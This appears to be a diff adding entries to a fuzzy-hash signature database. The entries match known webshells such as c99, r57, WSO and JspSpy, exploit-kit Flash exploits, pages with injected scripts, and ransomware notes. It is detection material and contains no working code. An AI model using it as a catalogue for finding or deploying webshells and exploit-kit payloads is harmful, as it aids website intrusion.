+1536:mUvKAe80id3dzZ5bRqrgtS0iZOI7PMD0uihskJ9EXr5dU7x4ekCIvK+aR1lFWtT0:mwj3dzZ5+gIOI7PMouf5dgVVWt+L9,"CTT Shell.php"
+1536:mTYnxsd6USevN+ygBeJOjts+SST36O8kQ3RQNpN6TXJO3+aLi5ryHE/Oi+4EW+bo:qYnxsd6veNEs+Sk8kQ3z1t,"phpjackal.v1.3.php.txt"
+1536:mTYnxsd6USevN+ygBeJOjts+SST36O8kQ3RQ8:qYnxsd6veNEs+Sk8kQ3/,"PHPJackal-v1.5-2.php"
+1536:mTYnxsd6USevN+ygBeJOjts+SST36O8kQ3RQ2wfn9Nd20IcYa/JAvcgYT6E46bfR:qYnxsd6veNEs+Sk8kQ3kt5,"PHPJackal-v1.5.php"
+1536:mSzlRlirMzaWRNeCdzaWRNedLwiAciliJ489EYShHwj:mBjjE8489jj,"老V.jsp"
+1536:mswUnasH7kljxqok8VHV/BV6dekHxhJRBXQYGoxAtdlitvSEXt:nwEaa7SjxqokqV/BwDJbXQuaitDXt,"2016-05-19-EITest-Neutrino-EK-flash-exploit.swf"
+1536:MsNXIlidRzaWRNe2dzaWRNedO3n9cumm6bkWsE0pcpj:MqIY1MkWsgj,"a.jsp"
+1536:MqehB3TryGo0Yr+TqoiLsRFM51aHWLSTmt+EmxYYSWxAzCsupIoKFRHps8jdVYl:GqwM51XSTmtiCq,"r57shell1.24.php"
+1536:MpEEBOFvU4KuberHrGNXD19K5udHTlv0obZ7wmaB:+OZyrLGp1ZpTt17w,"2016-08-18-Afraidgate-Neutrino-EK-flash-exploit.swf"
+1536:mPBcELJ7QZKw5Tega2cxLDV0EhFRQOT17ALoI7vCDzx8YYS0+RgvHCsLO+Jq:wX0ZEhZxLDy217ALJ7vCDzGYH0QgvHCJ,"2016-03-29-other-Angler-EK-flash-exploit-after-localtasteblog.com.swf"
+1536:MNhP8ghuVH98aK7g+27XctPStjT8cyMhynaV0xiJztfyl8ZSMg4P1jFmyR:MNpEVH7p+7PStjB3ffymZSMdP1jFmyR,"title96.php"
+1536:MkcNW/iSw+CmmMRKptpzIfRey04PI12471MqJ3PDN:MahKptpERpsJFN,"tiamo.php.decode.txt"
+1536:MIVNIdshNku6NjGdQnKZmjbyM7KTUuBp+1dR644NmQE490IPp/:My6N9KbBp2RSxB/,"404.php.no.txt"
+1536:MGtbNU/bQwZrKJkNRHrBvwWUg80qHwoi2bLPQ1:MR/8wYCFrBIU80OwoiiPQ1,"2016-08-05-EITest-Neutrino-EK-flash-exploit.swf"
+1536:mGFVLeF9y50ut4ZizUCc58lEBMgp7Ysel2gteKzK:n3qut4H5F5+l2gten,"bypass.txt.001.001.001"
+1536:mGFVLeF9y50ut4ZizUCc58lEBMgp7Ysel2gteKz3:n3qut4H5F5+l2gteY,"bypass.php"
+1536:mfvnGvo/iFzNuvcqwItKYwOhReyxVL180560znGOjrWClQJQPV:m//iOvcqCwR9LRJXnGOjr+OPV,"accordion-shortcode.php"
+1536:mfvnGvo/iF87KBYsUG1ilSu5QHGJe2ucdE+nUMtOO9NaeP3:m//imKRXInUCOO9t,"404.php-2"
+1536:M9VNIdshNku6NjGdQnKZmjbyM7KTUuBp+1dR644NmQE490IPpX:Mh6N9KbBp2RSxBX,"404.php.txt"
+1536:m6vYxmdutL8ZEQ20UvIZIEQwgJkxguPTC4dcMY:kxofZEQXbguPI,"body.113.025"
+1536:M6TYxyHUwBvYezd8BezdRB7X+i4MB0U7+XJ2P/7R7PT9ZRq85QoV5rl0gnSPTCv3:6xbCvYezdqezd8MxP/x7J0gnSPS,"body.113.100"
+1536:m6TYxyHOwT0U9uDSzM9/96ydwdl6/UgFyYLyYZpBEWOrlWgnSPTCvKtS:4xJTF6ydwdl68RTJWgnSPc,"body.113.087"
+1536:M6TYxYaWbRB77J7sgfJ8VYDoRDcEZF3wOyyZYFSPII4xiIscw724oXZzCgnSPTCP:6xUFB77J7zJwRb1w9yZxSCfiCgnSPO,"body.113.052"
+1536:M6TYxYaQwb0tytRur7NEXy5VcpI16OEJe8ZQmHEZTcE1OcKXzigtSPTCvstS:6xiJtytQr7NEC5yI16OEo8ZSMigtSPu,"body.113.047"
+1536:m6TYxya8wUe/h6F6pb83DLs/HzWFR96jKMNB77da0xYOrlKgnSPTCvitS:4xoPe/h6F6W3DLsfzSps7A2JKgnSPM,"body.113.093"
+1536:m6TYxya2w6Co1Tmemjw9TztMCsCGtX/6SnOEw4qOBrlvgnSPTCv6tS:4xipTZwZZ9JvgnSPE,"body.113.063"
+1536:m6TYxXEYkwL3PWLAhx0WhtkBs4qaUuxvQ+aKg3h3LNLSdgnyPTCvOtKy:4xZkqPpx0WZpvx0dgnyP8y,"body.123.002"
+1536:M6TYxXEY88SvTF/kjJI6uAFL9QsZbvjZA9yGSm0ufaPE2SJ8YgnyPTCvMtKy:6x5LSLFv6uNsZbvjp6J8YgnyP2y,"body.113.363"
+1536:M6TYxXE8A88Xj9qUfg9GsIHoWh32vP2TIdO+Idi/5Y+gBjJgnyPTCvgtKy:6xVALT9qU49GsIH0vP2VJgnyPmy,"body.113.298"
+1536:m6TYxsENww5xYpKc9xatFIK2jJlYwjg9sNydxUOrlngnSPTCvatKy:4xlj5xYpKSK29luJngnSP4y,"body.113.168"
+1536:M6TYxsEfwi8MOhvVCD+HgLkNF0XNaBOQ4DHIBUkVh8/zf/1r9stsSQOrl6gnSPTJ:6xnIMO+D8gqFMaBO/oikG9BMJ6gnSP6y,"body.114.007"
+1536:M6iUm+qs6ao+pGoqhwg44vxumUs92I5/RDImL+:MamokThz+mUs9J5/6l,"magiccoder2.txt"
+1536:M4ax2YGNkGu5d39KtwlukVt9JWHBS/q2/bnoDSSRi4UJMdxHyXBzRyUdB1Jyq:wx2YGNkCtC/RnoDSVixE,"r57.txt"
+1536:lxml0lMph8YvMjnNXZqrPUeTf4N64NchRH19Z9yjB9RSpIyogToo6:lxRA6YGXZePUeTgY4yHWrQZco6,"sh.php.4"
+1536:LVE+wdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:LL,"good.php.13"
+1536:lVcPjIqQ8044SxOyzjAFxrsRfy1ksbbbbbbbAwkITMswCwaO0cOuUZTvgbpoxKLL:bcP8axOyzjAlkITMZCwnEuUTvMpPKI,"PHPJackal.jpg"
+1536:lTEDwdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:lq,"good.php.9"
+1536:LsspxcWbDdjdPjmED2jZ2f+trJXEmiMKqbfVLL8:LsspxjbDdjdPpMFL8,"40053b855d1e3782af9def6131792908_php.txt"
+1536:LRMIm9fkE6je8yelYzg4emPwYg4jUlEx+TjncOMuk34D6ZA5rrP:69kE6je8yelYzg4emPwYwTXMx34D6ZAF,"ElmaliSeker.cer"
+1536:LRMIm9fkE6je8yelYzg4emPwYg4jUlEx+TjncOMuk34D6ZA5rrH:69kE6je8yelYzg4emPwYwTXMx34D6ZAV,"elmaliseker.txt?"
+1536:lqehB3TryGo0Yr+TqoiLsRFM51aHWLSTmt+EmxYYSWxAzCsupIoKFRHps8jdVYp:RqwM51XSTmtiCO,"VirusShare_3ff71b2a6568ad83512015b9c073802d"
+1536:lP6TYxsEL0nwBtJ6sLSeqpGqEzjemeg99T+sNQOqXIEvUEdryHYTU9HX4Cg74Orf:lZxz0n7EfemecMXxMUNINuJUgnSPKmy,"body.113.234"
+1536:LOSQRPj2zVlf5HtH3olGy0N+C3Th262VcwCaWTEEhkUYXj4nraWO18CAQ+6oppRL:aRPj2YlgUU0j4nraWO18CAQ+6oppR0rS,"2016-01-12-page-from-www.ayurdhama.com-with-malicious-script.txt"
+1536:LoEpudhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:Lx,"good.php.38"
+1536:lmUbFkfZeqxkIsasBqRJbUJYx/DZdvPlQVZ8hf/JvAO2XPLJr0u6MwhwyFu/:27seFxPvqZ8hJnBM,"2016-06-01-page-from-infinitepowersolutions.com-with-injected-pseudoDarkleech-script.txt"
+1536:LJNx7zz899wnH6zYHC4LyEQ4I1HWGQWzWae686za1L5fw0VdTHf1lMFjeBHGBZ1p:tNm4Uq+J8V5fVVdTHf1lMFjgKH,"UnKnown 高级Vip防删收费版.asp"
+1536:lI1ACjoNyIpe7I5rmPPGvad8BlLkEK24WHRVTkRecCBOqKoHJan6etx:G1AfNyIpe7PPPkadSLkErBRK4Bo36ox,"2016-07-08-EITest-Neutrino-EK-flash-exploit.swf"
+1536:LfnQwPVaSlUR2y/MKbbJ/PM5rpzye+cZe1qeC+WzSZ:LYRhEsPM5rp8+Q,"WSO_4_0_5.php"
+1536:LEdWoDYQ4aylZj4wozIJbeDacah5hm4gr9jugq+I+vHfOaFyhrd:QDYQuAwoEIDa44yDOa4hrd,"法克僵尸大马 (1).asp"
+1536:ldFXrhNt15gAdCy2EnKLV/BgV6o24b2mggpA+o6eS:lrXVNP5F/KLbS6ChA6eS,"2016-04-26-pseudo-Darkleech-Angler-EK-flash-exploit.swf"
+1536:L956GMVBp06X7l7/L/o4NYlczAgfPx7/mGQ8nAWilLebAbQaRaN5:L956GMVBp06X7l7/L/DzAgfPx7OGQ8nd,"ipaddr.py"
+1536:L/7iGolQ3iG/dssIBc85VoTIDjwEMEvDoh+S79qz+6iJRcJnCJln4rO:L/OS1qccnDjwR8Sv6ijcJnCJlnd,"Backdoor.ASP.Ace.co.asp"
+1536:L6TYxyHNw7hE242rvT5o/bFrvMXGlcBoco81jhVXRgjgJDjzWuEwsBjOrlQgnSPk:lxgZ242sFLk1jhVlx6iJQgnSPty,"body.113.111"
+1536:l6TYxyaRwfHkS7kLKsMGlT858IgXAV0to+OrlmgnSPTCv1tS:LxVoHkSQMGW59JmgnSPX,"body.113.091"
+1536:L6TYxyapwSTMQG+QY75jhN27irxexue+5rl+gnSPTCvbtKy:lxd1T4Y75ySJ+gnSPNy,"body.113.107"
+1536:L6TYxYacwHEYssWEJHxIHIGmsftdjuup3MAHSEbMTpcVrZ2AUHSzgHb48Ut1Y1SE:lxCzY6EJHx4frPsEbMTYrZ2UX8gnSPN,"body.113.061"
+1536:L6TYxYaCGwD4WyfhAOaIWwMBPRZ+ZkWzDZdDYttdx8WC7hgnSPTCvjtS:lxIGWOaIuL+Z3jY4hgnSP1,"body.113.059"
+1536:l6TYxXEx88S7CYgBPC8UPLNfWN+RJDH7ejxikuem1dT7CeVUSSDgnyPTCvFtKy:LxALS7CLCP/RJDH7ejJs9SDgnyPXy,"body.113.339"
+1536:l6TYxXEQwUx8MIMOh2yI+7U5BBfsgu6Nscyb1Mqq/ZGq7QJ+Sas14XgnyPTCvdtt:LxR9x8MOhv7QfTNscyb1AtrlXgnyPzy,"body.113.261"
+1536:L6TYxXEo88LPvVnvoyjatKKy5ToEXyI/aAG96kgFn+gnyPTCvPtKy:lxLLLlKy5T7n+gnyPxy,"body.113.313"
+1536:l6TYxXE8wxcJ/SIhmtAti+U/dR0FIqK32POISargnyPTCvptKy:LxZFJ/SIhmtNt3JOrgnyPny,"body.113.279"
+1536:L6TYxXE5888pYbIHILAcR7HHbTXHxmbOU2jnXlWbjnGSydgnyPTCv7tKy:lxWL8WIHILAcRbHbTXHwrnvydgnyP9y,"body.113.331"
+1536:l58U4ZbVZtzVTKf86wMaxl2jQx/G5uYF2h4:lmb5ZtzVeUxxfx/hYF9,"20160202-100846-Vq-zjmjuZ1YAAANRCaYAAAAK-file-SVgp5F.1454371727_1"
+1536:L4RtPvl+LliPeda0R3eo9da0R3e2EvWFCZKIVVvOzPjiTuWw6T4TR/rBPjpu22zz:StTEEvzKWw6Oaz,"JspSpy Private Codz By - Ninty.jsp"
+1536:L2ljDHFOEGq2MseK+0LRGlFySKxXj5fzg:a3gq2M1iwFySK9Fbg,"20160204-160717-VrLqlGjuZ1YAAGgICR4AAAAP-file-YEGY7Q.1454566038_1"
+1536:K/YmYH6rIr9x09h29ir9oq9zZ9yc9nx99L9EG9Hh9KO9R5V3rt:K/jYew92949Y939d9f9x9R9l9B919/dx,"c.txt.001"
+1536:KX7LAUiQM+JqQ8fpWLJMRc9qHIpk2U85AYE5//9C8gP/lIUcg5mVafSRDd+:Vx3eqQ8yJCc9qYX15AYK/U8YGRf4Ep+,"locus.zip"
+1536:kWDA8cKTzBSXLB9WkJF8PR5Q/1608uVfawA5uSZlmtbWIdRZZrs/Nu71:jjnBSX9hFQvQPfax/mdaNu71,"ob45.txt"
+1536:K+W7Rl58/h1BIjG4hgLrqqPBVorEPTT65lB:K3HEBIjG4orq2B6U6jB,"11.jpg"
+1536:/Kvxy8j6vmyWoCZ6kyVE9kYAblukVt9JW+mFD/unoDRSRx4UJodxpXwqXyUdv1JL:ky8j6vmTG7mknoDREaxj,"r57.txt"
+1536:KVqeBbRNg8aQdCFGuq+Tq9iLsRh4G51PjWVdgZy+EjHTSgUVwXoH5Z0O96VYy:WBbRNg8ku4G51qdgZyTh,"EngShell99-v99-Backdoor.PHP.Agent.php"
+1536:kV79v+o+exg7lZVpGEvd8LGzjSvWNEtj2:M9v+DeCOjL+ZIa,"VirusShare_2b06b440bad41fb02ba83d54bcfd5a20"
+1536:KsNXIlidRzaWRNe2dzaWRNedHNnfcGmQ6bkWsE0pcpT:KqIhdMkWsgT,"style.jsp"
+1536:KsePP8EPvijxDY0v11yIdJnbwm3zPiL4Ie5HpcV6nLkHnke:wP8EPvSjfyIdJncm32mpLYn5,"2016-06-17-pseudoDarkleech-Neutrino-EK-flash-exploit-after-nuvon.com.swf"
+1536:kPuBNQKSPQsb7O2m0eTE4u5n6OIf0IfxZSiHDcNLLVY1TKiIInN+vccvvTL75B1P:kPuBNQKSPQsb7O2m0eTE4knjIf0If/S7,"2016-03-09-page-from-imasummit.com-with-injected-script.txt"
+1536:+kOYr+LcURTaKmHD6iczginLaWMbV/FrhN+5IAr9cRmQIWby5:+k6LcmuKNNnLp23AJz6ba,"2016-08-18-pseudoDarkleech-Neutrino-EK-flash-exploit.swf"
+1536:KOqnvuIJBPE2rCN1y+Ub1imOhElbrv8HQWEET7D5:4XGfUUhE5zfEb5,"b374k-2.3.poly.php"
+1536:KMqajXXxD5wdZtYNEM5nPsqakYtZ4ukH3LRlkS:8OHxDazSNEM5nJEzpkH7Rb,"2016-05-18-pseudo-Darkleech-Angler-EK-flash-exploit.swf"
+1536:kM+/hhhhhhhmAAAAAAVYuxIr3VbnhNmJmUUMxWCEPlFMd/DTP6JhOVw6V/SQ:bWhhhhhhhmAAAAAAVYu2lbndPbMd/DT7,"c99_locus7s.jpg"
+1536:KMEQtdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:Kn,"good.php.30"
+1536:klxkCWxfa+Z6/589sWCmPbkUf/Od7pF8gY4/jURbZpDOyDDiHUdWrl8ukH6:ED+Z6/589sWCmPbkUf/OdV/6DYUdWrl/,"elmaliseker_01_by_forever5pi.asp.txt"
+1536:kLEbcaMzecNIyOBPJbFKo5kC0DKp5aGDrci0fpOreG6vru6HjS:kLEbcaMzu0DKp5L0f0roruY+,"CBFTEAM-Shell-cbfphpsh.php"
+1536:KL8zkQRoK/rmaYFIUvZQ/T6vEBAgI2B8q0JLbIacfcX4pC5jvvs:KLl2/yFva/T6gWtcf0uh,"2016-03-29-Nuclear-EK-landing-page-after-macfly-studio.com.txt"
+1536:kKibvw60sWyB5Vx3ju1Ua9mE9x7CSlwa+Y5RZ6+R9yWG5DSwcuVRSTlQYzIkyfuF:kKibvw60sWyB5Vx3ju1Ua9mE9x7CSlwe,"swift ea2.js"
+1536:KKhsKBwjViAmkpcaL06Q/rriYtvakH9bbpmas2ja/7CoQSIA:h5qBA1ao6siYAkVbmz/Tj,"2016-07-25-EITest-Neutrino-EK-flash-exploit.swf"
+1536:KjJMOcNkqRaBOR8yQ69mmMaKXP5Vp2yAC4C6MGB3Pf/t:KdMLRDf1KXP5VpqVl,"wso-4.2.3.php"
+1536:kiw7faLfwtnJGsTwDwPXYxtFV5UWMDLf15gLt85rWj:cjGs4bMnf15gLt85rWj,"2016-07-07-pseudoDarkleech-CryptXXX-decrypt-instructions.HTML"
+1536:kiw7faLfwtnJGsTwDwPXYxtFV5UWMDLf15gLt85rW6:cjGs4bMnf15gLt85rW6,"2016-07-29-EITest-campaign-CrypMIC-decrypt-instructions.HTML"
+1536:kiw7faLfwtnJGsTwDwPXYxtFV5UWMDLf15gLt85rAj:cjGs4bMnf15gLt85rAj,"2016-07-26-pseudoDarkleech-CryptXXX-decryption-instructions.html"
+1536:kiw7faLfwtnJGsTwDwPXYxtFV5UWMDLf15gLt85rAD:cjGs4bMnf15gLt85rAD,"2016-07-07-EITest-CryptXXX-decrypt-instructions.HTML"
+1536:kiw7faLfwtnJGsTwDwPXYxtFV5UWMDLf15gLt85rA6:cjGs4bMnf15gLt85rA6,"2016-08-05-EITest-CrypMIC-decrypt-instructions.HTML"
+1536:kiw7faLfwtnJGsTwDwPXYxtFV5UWMDLf15gLt85r2j:cjGs4bMnf15gLt85r2j,"2016-07-06-CryptXXX-decrypt-instructions.HTML"
+1536:kEPEB4WobvFtWULNI0bIl9SsAy2pgr9as3glq+I+PPJOa1yhpt:9dbvvWUmTSsABhOaohpt,"不灭之魂2013改进版本.asp"
+1536:KD74gm0kzLkarahvrFyyyyXwKjcR8cSLSvwowqMUlohfwY+tKxW/+:874gmlzoamhvT4CLGpM7fz+G,"Shell [ci] .Biz was here.jpg"
+1536:Kc4CwKfBjPK3R8DKRFTCRWXiNZknWCFL/R2SQeedlXblsq:Kc4KBu3RCSFTLnZjwS4dlLd,"2016-08-23-pseudoDarkleech-Neutrino-EK-flash-exploit.swf"
+1536:KBcNJWocvMmmMBKzVplyORAynnk4WENJj3PDB:KmEKzVpvRvn/fB,"VirusShare_4af8822fb5f139a362be09aaf35ef831"
+1536:k6vYxmotL8T5OePQumFDTNkj+U2R/luDb+bguPTC4dcMY:CxuT5OePQuIKWm+bguPI,"body.113.024"
+1536:k6TYxya7w/kTV7o51t16vlFYzIpWIyAxmgYYqCGjWyo8Y8n6iOBOrlegnSPTCvs7:ixP2kTV7ouFYzpIvxmgYYcwqJegnSPSy,"body.113.104"
+1536:k6TYxYa1wRlQlgNyHemQmqou3hI/DFzeUZ6YiSlrUTsnTvi/aauwgtSPTCv8tS:ixjcNyHfuvUZ9rsKwgtSPi,"body.113.049"
+1536:k6TYxXEywCjlx5V5aLY3onjzVTs3J0Jm7C2iYhn87TaNgnSPTCvstKy:ix3ZqYods3V5NgnSPCy,"body.113.250"
+1536:K6TYxXENzwx/mREnQappwDsW+sMtz8rTNpZ4ggnyPTCv+tKy:MxazGnED/OggnyP8y,"body.113.273"
+1536:k6TYxXEi88Es4wGUXpVS47K2ij3GSKHYhfaoYqgnyPTCvQtKy:ixbLEs4wlXpIMisjoYqgnyPCy,"body.113.347"
+1536:K6TYxXE788HE807S4HlqGp3zdOf82TT/jSVyvYhxrvBD+WFfgnyPTCvetKy:MxmLHEBSypDa82//iJHfgnyPMy,"body.113.302"
+1536:K6TYxsEgw6aTDECwnAGkK192IwXZ0VZV3UDBqrsZE04m0bBU1fkOrlmgnSPTCv67:Mx4wsz192IwJZssotcJmgnSPcy,"body.113.183"
+1536:K6TYxsE4w4aPa/zyEub3P5qpBm+7YX4NXlonqn0HUlD45rlggnSPTCvitKy:MxgsEubBqzcX4NMJggnSPAy,"body.117.001"
+1536:k6d+1CPXexGcgPALM8i130BwSCSnwONdN:k6dcCPXfFnh0Bpnf,"indrajith-2.0.php"
+1536:k4un6pii0rLwM3QJ853vXV+HoMnmwdqs0jxYKyKJBdQxgRN9B7+NvIUIQjMa7nlr:khn6pksgbMNqsCYdeRN9B7GQUIyoc24n,"81cdf0e7933c1a6253c942c5942f98f1_php.txt"
+1536:k34uEUDfr4hClTPR9DjLObnPr8KJpMcDAi5M:i4jhyFpfObnPr1trM,"2016-08-12-pseudoDarkleech-Neutrino-EK-payload-CrypMIC-after-dakarvoice.com.dll"
+1536:K1Vozm81DolTygECe0gVGHeTI55gd6ywZK6M/K+Za5/BWC7SBr3jdnp:KRskkRJGHeTI8ReAKF5/ICGBr3Bnp,"2016-07-25-pseudoDarkleech-Neutrino-EK-flash-exploit-after-depressivedisorder.xyz.swf"
+1536:K1Vozm81DolTygECe0gVGHeTI55gd6iwZK6M/K+Za5/BWJOELgsr3jdnL:KRskkRJGHeTI8BeAKF5/IQELgsr3BnL,"2016-07-25-pseudoDarkleech-Neutrino-EK-flash-exploit-after-sinyimusic.com.swf"
+1536:+k0O2CSMjNAjYMcgLKcd3gkan15FF4AbHDcmGfG1xgEGC1VwMZfdJmLDRVV9zPvb:+HoSM9MbLGlbHDc6ZVJmPnjyWeo/b,"2016-03-29-pseudo-Darkleech-Angler-EK-flash-exploit-after-uniquecoloringpages.com.swf"
+1536:k0NXIlidLzaWRNe2dzaWRNedOnn9cum26bkWsEKpcpT:kiuWPMkWsQT,"JspSpy Codz By - Ninty_1.jsp"
+1536:k0EbKogXhY5T3hJvVRCc6Mrkl7nBhqWABBjbrx/zq6x3a+Au1:joKdW5T3h3RCRMwl7BhqWAB53x/u6xqi,"2016-06-30-realstatistics-gate-Neutrino-EK-flash-exploit-after-tne.mx.swf"
+1536:jz09M5DM6Vnu8qyzR62FDcJ0TypHNP52lKjoWDknZ2i34:jz1DvnEpSotP1DZK4,"小红帽.asp"
+1536:jX2oooooooooooooooooooooooooooooo/hBr3JVIa+S7w5:D2ooooooooooooooooooooooooooooo5,"Crystal2.jpg"
+1536:JWHawEFCGR34++TqoiLsRCOJn51cCWLSTm8+EWerjXWx6tUMp9RLpzyujfYe:JWySn51GSTm8nJN,"r57_by_iFX.v1.42.php.txt"
+1536:Jw2z9sgKxFlG9rBIArYB+zSHH+EVepvO3xdCaKJ+buvGpIiR:G2zGtP6yYY8SHHjRhdC/4+GppR,"2016-07-13-other-Neutrino-EK-flash-exploit-second-run.swf"
+1536:jv9FPPPPPPPPPPPPPPPPPPqsFJyhuAp4UDCVRV81/TSQL2YcdAx332Iatd6DDDDf:79FPPPPPPPPPPPPPPPPPP3Xw4U24/2+7,"SnIpEr_SA Shell.jpg"
+1536:jTmFrIDjqNPpFcTR8JbggXOZ0sxgELWNaNIQ+l/Tgj3Fr5w81I:PmFro4RFYKMZZxgESNaULgj3pK81I,"2016-06-24-pseudoDarkleech-Neutrino-EK-flash-exploit-after-sunlait.com.swf"
+1536:jTmFrIDjqNPpFcTR8JbggXOZ0sxgELWNaLVSOQ+l/Tgj3F6hPjZgw81a:PmFro4RFYKMZZxgESNaLVJLgj30xln8c,"2016-06-24-pseudoDarkleech-Neutrino-EK-flash-exploit-after-fiocchidiriso.com.swf"
+1536:JsNXIlidRzaWRNe2dzaWRNedOnn9cum26bkWsEKpcyj:JqIWPMkWsjj,"luci.jsp.spy2009.jsp"
+1536:JsNXIlidgzaWRNe2dzaWRNedONnfcGmQ6bkWsE0pc9T:JqL8dMkWskT,"he1p.jsp"
+1536:jS7fNqd/YHgjW563K2rs1wM3hIBZT0iYofIgnbiOOEFK8hG:u6a563KJiM3Cb06IbP6K8hG,"2016-04-11-pseudo-Darkleech-Angler-EK-flash-exploit-after-condocosmetics.com.swf"
+1536:Jr6rxjoDt8bca7U9dUkOVgnlIfei3y8Bgb:Jr6rxjoDmn4Ckjnlbi3pBgb,"2016-08-17-pseudoDarkleech-Neutrino-EK-flash-exploit.swf"
+1536:JN+bv0swrQmyMJIAtHKHyX5wcjBoDshrGsF0sQqiGSbG7oWdXzvj9lSkol8vj2S1:JNEKQrsKHyX5wcjiQhCqGLWFvj9lSkhN,"Backdoor.ASP.Ace.fi-狐狸WEBSHELL鼠年增强版.asp"
+1536:JMy6sMOrItjFTTRB6P6R6HSQEUn7kvCCtHT1:36I6T36P6R6yG7kvxR,"devilzShell.aspx"
+1536:JLnnnnuYLaWWQ9Crx+9ku/SjTJ0iHkKrZUflXfJnMLJg:YYLaPmau/SjNAKuf/MFg,"c99_madnet.jpg"
+1536:jkgMg2LkEcpZqliEFfXOaPR4eMLJRFRamRHe5gZ6Rg7HhUyS6fOwoKZbUSYGeebE:YLgsT+6RSgSYGL45aTq,"config.jsp"
+1536:JkcU2Y5MUXkjU9cDXwNeyFlVS7pLtaS5SAjZqGUqaxvEIa6xkYcmfxFyE0jpb2a6:Jkd2Y57VAKfktRUA6k0pfTRVgipsBO,"2017-03-02-page-from-hurtmehard.net-with-injected-script-1st-run.txt"
+1536:jjwMOcNkqmaBOR8yQn9mmMaKXPMVplyAC4C6Mg63Pf/V:jcMURDo1KXPMVpHIN,"wso-4.2.2.php"
+1536:JIo18jAAJMA073AAYseFZV30e/teo3AAgsTG9yAAI5XNssgkkkkeXY37rfssokm:i9lzZsbY3vfss8,"r57_Mohajer222.jpg"
+1536:jHO6x5rJQhv35rZ7EjW8/RKcwm3zPiL4Ie5HpcV6njkHnkb:7x5r6hvJqjR5K7m32mpjYnk,"2016-06-17-pseudoDarkleech-Neutrino-EK-flash-exploit-after-ex.technor.com.swf"
+1536:JhJKD0uYQH1K+PYf0meBCqsvxJaJQWSMM9Ecj27t0CZ4:fS0u9F1HsvDgQWSMMV27tb4,"2016-07-21-other-Neutrino-EK-flash-exploit-first-run.swf"
+1536:JhJKD0uYQH1K+PYf0meBCq8vxJaJQWSMIcQoY9E2x//27t0CZD:fS0u9F1H8vDgQWSM6oYtxH27tbD,"2016-07-21-other-Neutrino-EK-flash-exploit-second-run.swf"
+1536:jHEDwdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:j+,"good.php.11"
+1536:JgrNCIH+H6kcTSDu807zAqpkurN4dKHL7y:JgUIH66dmDu74qlrNZi,"20140901-06.png"
+1536:je+LLM5QT3X0FCKT+ZqRrfZoTV3uPcWPiVipfmO0BEfJa3HYyJA:jnE5QTzKT+cRrho1uPcWPVVmbV3HYyJA,"2016-05-25-EITest-Angler-EK-landing-page.txt"
+1536:JEG7esUvCPXxMOhbijdCTOTrqaega2YiMqAvEDU4egcyk0glA:SG7yqiOVihCSnHega2VppDU4Fcyk0glA,"co.php.txt"
+1536:JeEOQdhWBgyzAth86qnVs1u7vA7uhpl2g1Oti+tq:JE,"good.php.36"
+1536:JbITsq2GpEG18fHlBAMGcCG2R//lsndGw+wro/s4oiq6j/:lhq2GUtCG2RXlsnzoJq6j/,"r57_Mohajer22.jpg"
+1536:j6TYxyaVw91Xdy4hQTGqhhI3o436owzIJz38XGfJM5rl8gnSPTCvvtS:Nxpe1XdPqU3o4Ko6J8gnSPN,"body.113.095"
+1536:j6TYxyaowPiQTSyXlXhQA6/OAZ0J7I6AoJU0+1X4a3kVTF35EvBrl5gnSPTCvPtt:NxUg2yXlXg/OAZ0a6laNuqZJ5gnSPJy,"body.113.132"
+1536:j6TYxyaNw/vBhDy3IjtB3hzjzkY/vx5dyIGAWEiMEvvl15rlXgnSPTCvXtKy:NxZ73IjtBJPrxJwvlJXgnSPRy,"body.113.122"
+1536:j6TYxya4wHnVBV4emCzxBjWuHYAxXewuwdyCXqk0EvCdBho5rldgnSPTCv/tKy:NxcunVBV4emCzxBjrxOwdd6uJdgnSP1y,"body.113.135"
+1536:J6TYxXEb88FKc/vZOIpHPlDvihPwQ/YPqlm32NQEGGExua3MAgnyPTCv9tKy:PxaLFHvdvihPXYPV3MAgnyPPy,"body.113.361"
+1536:j6TYxXE2E88ASsgSs7sKal+L3MtItTvkiSDdnGtf7q6LYwneFegnyPTCvLtKy:NxXELASzS/KkntItQDdBegnyPZy,"body.113.287"
+1536:j4X3bvw60sWyB5Vx3ju1Ua9mE9x7CSlwa+Y5RZ6+R9yWG5DSwcuVRSTlQYzIkyfm:j4X3bvw60sWyB5Vx3ju1Ua9mE9x7CSlh,"swift 822.js"
+1536:J4RtPvl+Llieeda0R3eo9da0R3e2EvnFCZKIVVvOzPjiTuWw6T4TR/rBPjpu22zz:It6EEvSKWw6Oaz,"t00ls1.jsp"
+1536:J0NXIlidszaWRNe2dzaWRNedOnn9cum26bkWsEKpcmT:JiHWPMkWszT,"m.jsp"
+1536:J0NXIlidbzaWRNe2dzaWRNedOnn9cum26bkWsEKpc+T:Ji+WPMkWsbT,"JspSpy-x7.jsp"
+1536:ixml0lMph8YvMjnNXZqrPUeTf4N64NchRH19Z9yjB9RSpIyogTooE:ixRA6YGXZePUeTgY4yHWrQZcoE,"sh.php"
+1536:iXGD7TVzhSpSaUdLQNDVwUp5x7NH9i3mX7bfJKMuGA+IZkwG9+FMfLJb8U:iXGD7Z0pZiENRwUpf6eRKF+WkwvgtbB,"php1.php"
+1536:IX7bNl5R1Ddvrv0tpMBKiztMFpqTwhRde+74wfBwPzy:Iz5hfKiztMFpbRvzgy,"VirusShare_1eafba1a5db0fb9527541ca95f8a4de9"
+1536:IwaaYa3bzpQH/tTyAdB90oWLA1hbYHYtrdkRlI8rm7doJCqT+c0JS:xaaiTdaoZYwkR7rm7o/,"c99.jpg"
+1536:iVXevCTNDBwQhQ/TZ3k2XT4diEW+Juhj7NeLxfn1qyMEoPOwg+x:iXTNtwsW1XTyXJa7Ne1n1oELwDx,"2016-07-11-Magnitude-EK-flash-exploit.swf"
+1536:Iu6TYxXEs3k88WrOfIpYUf4BydnRShFZOQZjPL3gnyPTCvaAtKy:Iwxj3kLWrOfIKK4B5PL3gnyPZby,"body.113.341"
+1536:ISrbNDn+X47tpMwKHIpmOZz50Mc+TOS4xXwP+k:IAn3jKHIpPz50MVO3rk,"15096fd6039a7d21f9c83b437c47b886_php.txt"
+1536:iRa8BbpKkU7IihdUZO4mqkAoJBlTRVvoVhsgasq8yd4/b33gx:iRa8VpO7jQZO4mqefRyhKrd7,"2016-05-23-pseudo-Darkleech-Angler-EK-flash-exploit-vs-flash-21.0.0.213.swf"
